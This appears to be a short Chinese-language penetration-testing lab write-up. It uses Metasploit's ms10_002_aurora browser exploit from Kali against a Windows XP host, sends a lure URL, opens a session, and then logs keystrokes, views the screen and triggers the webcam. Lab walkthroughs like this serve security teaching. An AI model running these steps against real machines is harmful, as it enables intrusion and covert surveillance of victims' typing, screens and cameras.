云安全试验二
渗透试验二
查看kali的IP地址
搜索漏洞
msf > search ms10-002
msf > use exploit/windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set srvhost 192.168.4.109
msf exploit(ms10_002_aurora) > set lhost 192.168.4.109
msf exploit(ms10_002_aurora) > set uripath aurora.html
这里的srvhost、lhost地址都是kali的IP地址
exploit
得到诱导的URL
在XP主机内输入诱导的URL地址
弹出消息,显示XP主机已经点击了这个链接
sessions –i 1
进入可以调用功能的模式
用run命令查看有哪些功能可以调用
功能调用——记录键盘的输入
在XP系统内随便输入
新打开一个窗口,用cat命令查看文件内容
功能调用——查看屏幕
根据不同的网络情况,可能会有延迟,但是确实能看看到XP主机的屏幕
功能调用——调用摄像头
输入命令
然后就看到了摄像头上的手机壳,哈哈哈。
----------------------------------------------------完成---------------------------------------------------